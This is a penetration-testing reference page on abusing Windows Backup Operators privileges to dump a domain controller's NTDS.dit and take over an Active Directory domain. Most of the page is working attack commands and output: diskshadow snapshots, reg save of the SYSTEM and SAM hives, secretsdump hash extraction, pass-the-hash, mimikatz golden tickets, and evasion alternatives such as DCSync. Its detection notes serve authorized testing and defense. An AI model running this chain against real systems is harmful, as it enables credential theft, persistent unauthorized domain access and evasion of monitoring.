Backup Operators
The Backup Operators group is functionally equivalent to Domain Admin when its members can log on to a Domain Controller. Members hold SeBackupPrivilege and SeRestorePrivilege, which together provide read and write access to any file on the system, bypassing DACLs. On a DC, the path to domain compromise is: enable the privilege → snapshot the C: drive with diskshadow (to bypass the NTDS.dit file lock) → copy NTDS.dit and the SYSTEM registry hive → run secretsdump.py offline → recover every domain user’s NTLM hash including krbtgt and Administrator.
# Confirm membership and privilegeswhoami /groups | findstr "Backup Operators"whoami /priv | findstr -i "Backup\|Restore"
# Enable SeBackupPrivilege (Disabled by default in token)Import-Module .\SeBackupPrivilegeUtils.dllImport-Module .\SeBackupPrivilegeCmdLets.dllSet-SeBackupPrivilege
# Snapshot C: to E: (bypasses NTDS.dit lock)diskshadow.exeDISKSHADOW> set context persistent nowritersDISKSHADOW> add volume C: alias cdriveDISKSHADOW> createDISKSHADOW> expose %cdrive% E:DISKSHADOW> exit
# Copy NTDS.dit + SYSTEM hive off the shadow copyCopy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.ditreg save HKLM\SYSTEM SYSTEM.SAVreg save HKLM\SAM SAM.SAV
# Extract hashes offline (attacker host)secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCALSuccess indicator: krbtgt and Administrator NTLM hashes appear in the secretsdump output. From the krbtgt hash, golden tickets give unlimited domain access.
Why Backup Operators is dangerous
Section titled “Why Backup Operators is dangerous”The Backup Operators group exists for a reason: members need to back up files they don’t own without granting them full admin rights. The Windows design grants them two privileges:
SeBackupPrivilege- Read any file regardless of DACL, usingFILE_FLAG_BACKUP_SEMANTICSonCreateFile.SeRestorePrivilege- Write any file regardless of DACL, set ACLs, set owners.
The “backup semantics” flag tells the kernel to skip access checks. Backup software needs this to traverse user profiles, encrypted folders, and protected system directories. Anyone with the privilege can use it for anything - there’s no “backup-only” enforcement.
Additionally:
- Backup Operators members can log on locally to Domain Controllers by default. Regular Domain Users cannot. The
Allow log on locallyuser-right on DCs includesBUILTIN\Backup Operatorsin default DC configurations.
These two facts compose into a full domain compromise: log on to the DC, use SeBackupPrivilege to read NTDS.dit, extract every domain credential.
This group is treated as equivalent to Domain Admins for risk-modeling purposes in Microsoft’s own guidance, despite the name not implying so.
Confirming membership and privileges
Section titled “Confirming membership and privileges”C:\> whoami /groups
GROUP INFORMATION-----------------
Group Name Type SID Attributes====================================== ================ ============ =====================================BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default...The presence of BUILTIN\Backup Operators in the membership list is the indicator.
C:\> whoami /priv
PRIVILEGES INFORMATION----------------------
Privilege Name Description State============================= ============================== ========SeMachineAccountPrivilege Add workstations to domain DisabledSeBackupPrivilege Back up files and directories DisabledSeRestorePrivilege Restore files and directories DisabledSeShutdownPrivilege Shut down the system DisabledSeChangeNotifyPrivilege Bypass traverse checking EnabledSeIncreaseWorkingSetPrivilege Increase a process working set DisabledSeBackupPrivilege and SeRestorePrivilege appear, both Disabled. The disabled state is normal - most Windows operations don’t require these privileges, so they’re held but inactive. Enable them programmatically before use.
The SeShutdownPrivilege shown above is also notable - it lets the holder shut down a DC, which on its own is a denial-of-service capability worth flagging in reports.
Enabling the privileges
Section titled “Enabling the privileges”The SeBackupPrivilege PoC by Giuliano Bertoletti ships two DLLs and a set of PowerShell cmdlets that handle privilege enabling and file copying together. Use these as a unit.
PS> Import-Module .\SeBackupPrivilegeUtils.dllPS> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS> Get-SeBackupPrivilegeSeBackupPrivilege is disabled
PS> Set-SeBackupPrivilege
PS> Get-SeBackupPrivilegeSeBackupPrivilege is enabledThe Set-SeBackupPrivilege cmdlet calls AdjustTokenPrivileges internally to flip the state from Disabled to Enabled.
After enabling, whoami /priv confirms:
SeBackupPrivilege Back up files and directories EnabledSome configurations require an elevated console (UAC consent) before the privilege can be enabled. If the cmdlet fails, run from an elevated shell - whoami /groups will indicate UAC posture.
Bypassing file locks - VSS snapshots
Section titled “Bypassing file locks - VSS snapshots”SeBackupPrivilege lets you read any file that the kernel will read. The kernel won’t read files held with exclusive locks - Active Directory locks NTDS.dit for its own use, so even with the privilege, a direct CreateFile on C:\Windows\NTDS\ntds.dit fails.
The standard workaround: take a Volume Shadow Copy snapshot of the C: drive. The shadow copy is a point-in-time read-only volume containing every file as it was at snapshot time. NTDS.dit in the shadow copy isn’t locked because the AD service is using the version on the live volume, not the snapshot.
diskshadow workflow
Section titled “diskshadow workflow”diskshadow.exe is the built-in Windows tool for managing Volume Shadow Service. Interactive use:
C:\> diskshadow.exe
Microsoft DiskShadow version 1.0Copyright (C) 2013 Microsoft CorporationOn computer: DC, 10/14/2020 12:57:52 AM
DISKSHADOW> set verbose onDISKSHADOW> set metadata C:\Windows\Temp\meta.cabDISKSHADOW> set context persistent nowritersDISKSHADOW> add volume C: alias cdriveDISKSHADOW> createDISKSHADOW> expose %cdrive% E:DISKSHADOW> exitWhat each command does:
set verbose on- More output for troubleshooting.set metadata C:\Windows\Temp\meta.cab- Where to save shadow metadata (deleted on exit ifpersistentisn’t set).set context persistent nowriters-persistentmakes the shadow survive diskshadow exit.nowritersskips the VSS writer coordination that AD uses - without this, AD might pause or refuse the snapshot.add volume C: alias cdrive- Identify the volume to snapshot; alias for later reference.create- Actually take the snapshot.expose %cdrive% E:- Mount the shadow copy as drive letter E:.exit- Leave the interactive prompt.
After exit, E:\ is the read-only snapshot. Verify:
PS> dir E:
Directory: E:\
Mode LastWriteTime Length Name---- ------------- ------ ----d----- 5/6/2021 1:00 PM Confidentiald----- 9/15/2018 12:19 AM PerfLogsd-r--- 3/24/2021 6:20 PM Program Filesd----- 9/15/2018 2:06 AM Program Files (x86)d----- 5/6/2021 1:05 PM Toolsd-r--- 5/6/2021 12:51 PM Usersd----- 3/24/2021 6:38 PM WindowsThe E:\ drive looks like C:\ at the moment of snapshot. The NTDS.dit on E:\ is not locked by AD.
Non-interactive diskshadow
Section titled “Non-interactive diskshadow”For scripted use, write the commands to a file:
C:\> echo set context persistent nowriters > diskshadow.txtC:\> echo add volume C: alias cdrive >> diskshadow.txtC:\> echo create >> diskshadow.txtC:\> echo expose %cdrive% E: >> diskshadow.txtC:\> echo exit >> diskshadow.txt
C:\> diskshadow.exe /s diskshadow.txtThe /s flag runs from a script file. Useful for embedding in larger automation.
Copying NTDS.dit
Section titled “Copying NTDS.dit”With the shadow copy mounted, use the SeBackupPrivilege-aware copy cmdlet:
PS> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Copied 16777216 bytesThe cmdlet uses CreateFile with FILE_FLAG_BACKUP_SEMANTICS plus BackupRead/BackupWrite API calls - the kernel-level path that respects SeBackupPrivilege.
Standard copy or xcopy will fail with access denied even with the privilege enabled, because those commands don’t request FILE_FLAG_BACKUP_SEMANTICS. Use the cmdlet, not copy.
Pulling the SYSTEM hive
Section titled “Pulling the SYSTEM hive”NTDS.dit alone is useless - its contents are encrypted with keys derived from the SYSTEM hive’s bootKey. Pull both:
C:\> reg save HKLM\SYSTEM C:\Tools\SYSTEM.SAV
The operation completed successfully.
C:\> reg save HKLM\SAM C:\Tools\SAM.SAV
The operation completed successfully.reg save works with SeBackupPrivilege to dump any registry hive to a file. SAM is also useful for local administrator hashes; on a DC, SAM contains the DSRM (Directory Services Restore Mode) administrator account which is often shared across DCs.
Robocopy alternative
Section titled “Robocopy alternative”The built-in robocopy utility has a /B flag for “backup mode” which uses backup semantics:
C:\> robocopy /B E:\Windows\NTDS .\ntds ntds.dit
------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows-------------------------------------------------------------------------------
Started : Thursday, May 6, 2021 1:11:47 PM Source : E:\Windows\NTDS\ Dest : C:\Tools\ntds\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
New Dir 1 E:\Windows\NTDS\100% New File 16.0 m ntds.dit
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras Dirs : 1 1 0 0 0 0 Files : 1 1 0 0 0 0 Bytes : 16.00 m 16.00 m 0 0 0 0/B is the key flag - it tells robocopy to use backup semantics, which requires SeBackupPrivilege. Without it, robocopy hits the standard access-denied path.
The advantage of robocopy: no external DLLs to drop, no PowerShell modules to import, just a Microsoft-signed binary that’s always present. The disadvantage: more visible in process logs as the canonical “I’m exfiltrating data” pattern.
Extracting credentials offline
Section titled “Extracting credentials offline”Transfer ntds.dit and SYSTEM.SAV to the attacker host. NTDS.dit is large (often hundreds of MB to multiple GB on real domains); plan transfer accordingly.
secretsdump.py
Section titled “secretsdump.py”$ secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xc0a9116f907bd37afaaa845cb87d0550[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Searching for pekList, be patient[*] PEK # 0 found and decrypted: 85541c20c346e3198a3ae2c09df7f330[*] Reading and decrypting hashes from ntds.ditAdministrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WINLPE-DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7abf052dcef31f6305f1d4c84dfa7484:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a05824b8c279f2eb31495a012473d129:::htb-student:1103:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::bob:1105:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::Output format is domain\username:RID:LMhash:NThash:::. The RID 500 is the built-in Administrator. RID 502 is the krbtgt account whose hash signs all Kerberos tickets - owning this hash means owning the domain.
The LMhash field is usually aad3b435b51404eeaad3b435b51404ee (empty LM hash) on modern domains because LM hashes are disabled by default. The NThash (NTLM hash) is what matters.
What to do with the hashes
Section titled “What to do with the hashes”- Administrator (RID 500) - Pass-the-hash to any system.
psexec.py -hashes :NTHASH DOMAIN/Administrator@target. - krbtgt (RID 502) - Generate golden tickets with
mimikatz:kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:HASH /ptt. The golden ticket lets you impersonate any user in the domain without their password. - Computer accounts (RID 1000+) - These end in
$(e.g.,WINLPE-DC01$). Useful for AD CS abuse, certificate-based escalation, and various lateral-movement tricks. - All accounts - Feed the hashes through hashcat (mode 1000 for NTLM) to recover plaintext passwords; often reveals password-reuse patterns across the org.
DSInternals as alternative extractor
Section titled “DSInternals as alternative extractor”The PowerShell DSInternals module also extracts hashes from NTDS.dit but provides more granular output including supplemental credentials:
PS> Import-Module .\DSInternals.psd1PS> $key = Get-BootKey -SystemHivePath .\SYSTEMPS> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
DistinguishedName: CN=Administrator,CN=Users,DC=INLANEFREIGHT,DC=LOCALSid: S-1-5-21-669053619-2741956077-1013132368-500SamAccountName: AdministratorSamAccountType: UserEnabled: TrueSecrets NTHash: cf3a5525ee9414229e66279623ed5c58 LMHash: NTHashHistory: Supplemental Credentials: Kerberos: Credentials: DES_CBC_MD5 Key: d60dfbbf20548938 KerberosNew: Credentials: AES256_CTS_HMAC_SHA1_96 Key: 5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43 AES128_CTS_HMAC_SHA1_96 Key: 94c300d0e47775b407f2496a5cca1a0a DES_CBC_MD5 Key: d60dfbbf20548938The Kerberos keys (AES256, AES128, DES) are the keys used to encrypt Kerberos tickets. Useful for:
- Pass-the-key (similar to pass-the-hash but with AES Kerberos keys)
- Silver ticket forging for specific services
- Decrypting captured Kerberos tickets offline
DSInternals also reveals password history hashes (NTHashHistory), useful for spotting predictable password rotation patterns.
Cleaning up
Section titled “Cleaning up”After exploitation, optionally clean up the shadow copy:
C:\> diskshadow.exe
DISKSHADOW> list shadows all* Shadow copy ID = {dc69eeb9-99f4-4bbd-94a7-c0a3d5f7e6d3}...
DISKSHADOW> delete shadows id {dc69eeb9-99f4-4bbd-94a7-c0a3d5f7e6d3}DISKSHADOW> exitOr unexpose the drive letter without deleting:
DISKSHADOW> unexpose E:This leaves the shadow copy in place but removes the visible drive letter. Useful if you need to come back.
Operational considerations
Section titled “Operational considerations”Detection
Section titled “Detection”Backup Operators abuse leaves significant evidence:
- Sysmon event 11 (FileCreate) on
ntds.ditcopies and*.SAVregistry exports - Security event 4673 if backup-privilege use is audited (rare default)
- VSS service activity -
Service Control Managerevents when diskshadow runs - Defender for Identity - alerts on AD-database file access from unusual processes
Modern EDR with AD-aware rulesets will catch the diskshadow → reg save → file copy chain. The technique is well-known and signatured. For evasive engagements, alternative paths are:
- DCSync via
mimikatz lsadump::dcsync- uses the AD replication API directly, more legitimate-looking on the wire than file copies, but requiresDS-Replication-Get-Changespermission rather thanSeBackupPrivilege - Volume Shadow Copy Service via VshadowAPI rather than
diskshadow.exe- less obvious binary execution - NTDSUtil-based dumping - uses the AD-native tool, sometimes flagged less aggressively
Restoration
Section titled “Restoration”Engagements that require minimal disruption: the shadow copy itself is non-destructive (it’s a read-only snapshot of the live volume), but it consumes disk space. The .SAV files and copied NTDS.dit on the host should be deleted after extraction. Document the timeline carefully - the act of dumping NTDS.dit usually triggers an incident response regardless.
Other use cases for SeBackupPrivilege
Section titled “Other use cases for SeBackupPrivilege”Beyond the NTDS.dit attack on DCs, SeBackupPrivilege opens read access to anything on the filesystem:
- Reading other users’ protected files -
Copy-FileSeBackupPrivilege C:\Users\admin\Documents\creds.txt out.txt - Reading registry hive backups -
reg save HKU\.DEFAULT default.savand similar for any hive - Reading service binaries owned by
TrustedInstaller- useful for offline analysis - Reading other users’ DPAPI master keys -
%APPDATA%\Microsoft\Protect\<SID>\<GUID>- for credential decryption later
SeRestorePrivilege opens write access:
- Service binary replacement - overwrite
C:\Program Files\<app>\service.exewith malicious code - DLL hijacking on protected paths - write to
C:\Windows\System32\if you can find a missing DLL - Registry modification - write keys that ordinary users can’t, including autorun locations
The combination of both on a non-DC host is equivalent to local admin via the service binary replacement path.
Quick reference
Section titled “Quick reference”| Task | Pattern |
|---|---|
| Confirm membership | whoami /groups | findstr "Backup Operators" |
| Confirm privileges | whoami /priv | findstr -i "Backup|Restore" |
| Enable SeBackupPrivilege | Import-Module .\SeBackupPrivilegeCmdLets.dll; Set-SeBackupPrivilege |
| Check privilege state | Get-SeBackupPrivilege |
| Snapshot C: with diskshadow | set context persistent nowriters; add volume C: alias c; create; expose %c% E: |
| Scripted diskshadow | diskshadow.exe /s script.txt |
| Copy with backup semantics | Copy-FileSeBackupPrivilege SRC DST |
| Robocopy with backup mode | robocopy /B SRC DST FILENAME |
| Save registry hive | reg save HKLM\SYSTEM out.sav |
| Save SAM | reg save HKLM\SAM SAM.SAV |
| Save SECURITY | reg save HKLM\SECURITY SECURITY.SAV |
| Local extraction (no NTDS) | secretsdump.py -sam SAM.SAV -system SYSTEM.SAV LOCAL |
| Domain extraction | secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL |
| DSInternals load | Import-Module .\DSInternals.psd1; $key = Get-BootKey -SystemHivePath .\SYSTEM |
| Pass-the-hash with NT hash | psexec.py -hashes :NTHASH DOMAIN/Administrator@target |
| Golden ticket from krbtgt | mimikatz # kerberos::golden /user:Administrator /domain:DOM /sid:SID /krbtgt:HASH /ptt |
| Cleanup shadow copy | diskshadow.exe, then delete shadows id {ID} |
| Detection event | Sysmon 11 on ntds.dit, sysmon 1 on diskshadow.exe |
| Stealthier alternative | mimikatz lsadump::dcsync (requires different permissions) |
For other privilege-based escalation primitives, see SeImpersonate (token impersonation), SeDebugPrivilege (process memory), SeTakeOwnership (file ownership). For other privileged groups with similar domain-compromise potential, see DnsAdmins and Other privileged groups.
Next move
Section titled “Next move”- NTDS.dit + SYSTEM hive obtained → process offline with
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL; you now have every domain user’s NT hash includingkrbtgt - Have
krbtgthash → forge golden tickets for persistent domain access (long-lived authentication artifact, survives password changes for ten years) - diskshadow fails (
failed to create shadow copy) → VSS writer may be disabled; try alternative VSS approach viawmic shadowcopy create Volume='C:\\', or userobocopy /Bdirectly with SeBackup token - SeBackupPrivilegeUtils not on PATH → fall back to PowerShell
Backup-WindowsRolesor copy the DLL onto the host first; verifywhoami /privactually showsSeBackupPrivilege Enabledin your current token - Got the hashes but DC is offline / can’t authenticate → use
secretsdumpLOCAL mode against the offlinentds.ditcopy; lateral via pass-the-hash to other hosts using harvested NT hashes - Not on a DC, just a member server → SeBackup still reads any file as SYSTEM - pivot to credential hunting (unattend.xml, web.config, browser data) or use the privilege to overwrite a service binary